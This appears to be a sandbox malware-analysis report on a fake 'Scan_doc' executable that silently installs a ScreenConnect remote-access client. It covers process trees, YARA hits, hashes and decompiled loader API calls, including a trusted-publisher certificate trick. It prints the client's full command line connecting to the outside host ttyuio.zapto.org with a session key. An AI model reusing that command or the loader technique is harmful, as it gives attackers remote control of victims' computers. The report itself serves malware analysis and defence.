01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03 Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5

Target ID:	0
Start time:	00:16:16
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe"
Imagebase:	0x5e0000
File size:	83'368 bytes
MD5 hash:	0753315CBF45A34D4402E7B04A17FDDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:16:17
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase:	0x261f5290000
File size:	24'856 bytes
MD5 hash:	B4088F44B80D363902E11F897A7BAC09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:16:17
Start date:	02/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:16:17
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140
Imagebase:	0xfb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:16:18
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884
Imagebase:	0xfb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:16:18
Start date:	02/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	00:16:41
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
Imagebase:	0x100000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:16:41
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0xc10000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:16:42
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0xc10000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	00:16:42
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User"
Imagebase:	0xfc0000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	00:16:44
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System"
Imagebase:	0xbd0000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	1456
Total number of Limit Nodes:	4

Executed Functions

Function 005E1000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000000,00000104), ref: 005E1016
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 005E1025
CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 005E1032
LocalAlloc.KERNELBASE(00000000,00040000), ref: 005E1057
LocalAlloc.KERNEL32(00000000,00040000), ref: 005E1063
CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 005E1082
CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 005E10B2
LocalAlloc.KERNEL32(00000000,?), ref: 005E10C5
LocalAlloc.KERNEL32(00000000,00002000), ref: 005E10F4
CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 005E110A
CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 005E111A
CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 005E112D
CertFreeCertificateContext.CRYPT32(00000000), ref: 005E1134
LocalFree.KERNEL32(00000000), ref: 005E113E
LocalFree.KERNEL32(00000000), ref: 005E115D
CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 005E116E
CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 005E1182
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 005E1198
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 005E11A9
LoadLibraryA.KERNELBASE(dfshim), ref: 005E11BA
GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 005E11C6
Sleep.KERNELBASE(00009C40), ref: 005E11E8
CertDeleteCertificateFromStore.CRYPT32(?), ref: 005E120B
CertCloseStore.CRYPT32(?,00000000), ref: 005E121A
LocalFree.KERNEL32(?), ref: 005E1223
LocalFree.KERNEL32(?), ref: 005E1228
LocalFree.KERNEL32(?), ref: 005E122D

Strings

1.3.6.1.4.1.311.4.1.1, xrefs: 005E1193, 005E11A4
TrustedPublisher, xrefs: 005E102B
dfshim, xrefs: 005E11B5
ShOpenVerbApplicationW, xrefs: 005E11C0

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
API String ID: 335784236-860318880
Opcode ID: e7bd5ae90f5c20a2835ff495e938a1e0b08bb21ce4ec69db22ca75eb460f3941
Instruction ID: 5a801f71b1c03c1134866ad512109463d073da43e0996808fad5796f3f068180
Opcode Fuzzy Hash: e7bd5ae90f5c20a2835ff495e938a1e0b08bb21ce4ec69db22ca75eb460f3941
Instruction Fuzzy Hash: 78618E71A00258ABEB199F91CC89FAFBBB5FF48B51F000014F650BB290CB71AD04DBA4

Non-executed Functions

Function 005E191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 005E192B
IsDebuggerPresent.KERNEL32 ref: 005E19F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005E1A10
UnhandledExceptionFilter.KERNEL32(?), ref: 005E1A1A

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4b244bcfd978aa8742f1f3577c6532b72d6acb0eb21cecf751c297436512adc7
Instruction ID: 76aa58c197608a964eb0e769e66589d5ab2a0a89faabd4fdf5a8d288045eff23
Opcode Fuzzy Hash: 4b244bcfd978aa8742f1f3577c6532b72d6acb0eb21cecf751c297436512adc7
Instruction Fuzzy Hash: AA311475D01259DBDB21DFA5D989BCEBBB8BF08300F1041AAE44CAB250EB709A84CF45

Function 005E4573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005E466B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005E4675
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 005E4682

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d0f10ade7d370409b83c5ad344a67d9b50644d2d5201a233cf6115ad1a8672e8
Instruction ID: 2470f70fd35694528dc32094e1af6af1713609e9ee07a427de7bc3c7e70d039a
Opcode Fuzzy Hash: d0f10ade7d370409b83c5ad344a67d9b50644d2d5201a233cf6115ad1a8672e8
Instruction Fuzzy Hash: F031F4749012199BCB25DF65DC88B8DBBB8BF08311F5041EAE41CAB250EB709F858F45

Function 005E3677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002,00000000,?,005E3F66,00000003,005E209F,005E1AFC), ref: 005E3698
TerminateProcess.KERNEL32(00000000,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002,00000000,?,005E3F66,00000003,005E209F,005E1AFC), ref: 005E369F
ExitProcess.KERNEL32 ref: 005E36B1

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e93e02ec7a5395fb6cf55a9dba083162cd591dc67d07a40374c78b5958b27528
Instruction ID: ed39100c2ea284de3cb80b51757162bd06e8241119c791b4002f5f6a5011e397
Opcode Fuzzy Hash: e93e02ec7a5395fb6cf55a9dba083162cd591dc67d07a40374c78b5958b27528
Instruction Fuzzy Hash: 46E04631000288AFDF19AF65CE4DA4A3F69FF9038AB000014FAC58B231DB35EE42DA50

Function 005EA495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005EA490,?,?,00000008,?,?,005EA130,00000000), ref: 005EA6C2

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 92b1a345d530778d0b997507d6bac8de275cc82b8cdd110a9ea92ed9f42490ae
Instruction ID: 72576de9827fcba36f86616f37dee1c0b4b2b249f9e974810617fd6d0faf4927
Opcode Fuzzy Hash: 92b1a345d530778d0b997507d6bac8de275cc82b8cdd110a9ea92ed9f42490ae
Instruction Fuzzy Hash: 28B16D715106488FDB19CF29C48AB657FE0FF45364F298699E8DACF2A1C335E981CB41

Function 005E1BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005E1BEA

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: f9e6a828ad9439268c5d2f8e7fcdf133bc052a0b6f735ef21bbaba653b6bf45c
Instruction ID: 0b80b4a96d9c24aaca162b24d82c03c6ebfc2e21ad7d9eb5ad83e6889e2b8450
Opcode Fuzzy Hash: f9e6a828ad9439268c5d2f8e7fcdf133bc052a0b6f735ef21bbaba653b6bf45c
Instruction Fuzzy Hash: 50519BB1E10A85CBEB19CF6AD8857AEBBF4FB58300F24842AC445EB250D3799D45CF58

Function 005E1AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,005E1300), ref: 005E1AB1

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 90898c415ede746a78b45c253eb8089a54a975b8265c28d0a365a5bce4223f07
Instruction ID: c6cc50a0f2765eb0feb1443c2b977d9bf555960b181241dbefced9dccaa155fe
Opcode Fuzzy Hash: 90898c415ede746a78b45c253eb8089a54a975b8265c28d0a365a5bce4223f07
Instruction Fuzzy Hash:

Function 005E6893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 005E6893

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b07fc0f4eeefaa9cea39d8b49e73eda3d4f8457050576fdc67aa147d26c81194
Instruction ID: edf44b2fd74aed7540d706bc6650ddb41247b08dcd4c335878e4f9dd32ccff55
Opcode Fuzzy Hash: b07fc0f4eeefaa9cea39d8b49e73eda3d4f8457050576fdc67aa147d26c81194
Instruction Fuzzy Hash: EEA012702002018B93048F305A8520A35985510591F0100145004C4030D7244044FA01

Function 005E6507 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 005E654B

Part of subcall function 005E6078: _free.LIBCMT ref: 005E6095
Part of subcall function 005E6078: _free.LIBCMT ref: 005E60A7
Part of subcall function 005E6078: _free.LIBCMT ref: 005E60B9
Part of subcall function 005E6078: _free.LIBCMT ref: 005E60CB
Part of subcall function 005E6078: _free.LIBCMT ref: 005E60DD
Part of subcall function 005E6078: _free.LIBCMT ref: 005E60EF
Part of subcall function 005E6078: _free.LIBCMT ref: 005E6101
Part of subcall function 005E6078: _free.LIBCMT ref: 005E6113
Part of subcall function 005E6078: _free.LIBCMT ref: 005E6125
Part of subcall function 005E6078: _free.LIBCMT ref: 005E6137
Part of subcall function 005E6078: _free.LIBCMT ref: 005E6149
Part of subcall function 005E6078: _free.LIBCMT ref: 005E615B
Part of subcall function 005E6078: _free.LIBCMT ref: 005E616D

_free.LIBCMT ref: 005E6540

Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891

_free.LIBCMT ref: 005E6562
_free.LIBCMT ref: 005E6577
_free.LIBCMT ref: 005E6582
_free.LIBCMT ref: 005E65A4
_free.LIBCMT ref: 005E65B7
_free.LIBCMT ref: 005E65C5
_free.LIBCMT ref: 005E65D0
_free.LIBCMT ref: 005E6608
_free.LIBCMT ref: 005E660F
_free.LIBCMT ref: 005E662C
_free.LIBCMT ref: 005E6644

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 39056a3554606b8102f2b31b0a266991fc6044bd9305ab6255543d4fda9668bb
Instruction ID: 8c6a921def2c9b5cdf25026bf09b742dd40a6d29edd79f530f2bb9335384775e
Opcode Fuzzy Hash: 39056a3554606b8102f2b31b0a266991fc6044bd9305ab6255543d4fda9668bb
Instruction Fuzzy Hash: CD315B72604386DFEB28AA7BD849B667BE8BF903D0F54446AE0C9D7191DE31AC40CB51

Function 005E4330 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 005E4344

Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891

_free.LIBCMT ref: 005E4350
_free.LIBCMT ref: 005E435B
_free.LIBCMT ref: 005E4366
_free.LIBCMT ref: 005E4371
_free.LIBCMT ref: 005E437C
_free.LIBCMT ref: 005E4387
_free.LIBCMT ref: 005E4392
_free.LIBCMT ref: 005E439D
_free.LIBCMT ref: 005E43AB

Memory Dump Source

Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fb2c37c0361dbd01888cc5ba80ab10f3a9f7d1c33b1d2b6b4de398957a145008
Instruction ID: 61c163037def37bdbdd4faaae74d2c4ffd025f769c591aa62585da5ee8093ccf
Opcode Fuzzy Hash: fb2c37c0361dbd01888cc5ba80ab10f3a9f7d1c33b1d2b6b4de398957a145008
Instruction Fuzzy Hash: 6A119376604189EFCB49EF97D846CD93FA5FF84750F1140A2BA488B262DA31DE50DF81

Function 005E7AB4 Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,005E54C8,00000000,?,?,?,005E7D05,?,?,00000100), ref: 005E7B0E
__alloca_probe_16.LIBCMT ref: 005E7B46
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,005E7D05,?,?,00000100,5EFC4D8B,?,?), ref: 005E7B94
__alloca_probe_16.LIBCMT ref: 005E7C2B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005E7C8E
__freea.LIBCMT ref: 005E7C9B

Part of subcall function 005E62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,005E7E5B,?,00000000,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD), ref: 005E6331

__freea.LIBCMT ref: 005E7CA4
__freea.LIBCMT ref: 005E7CC9

Memory Dump Source

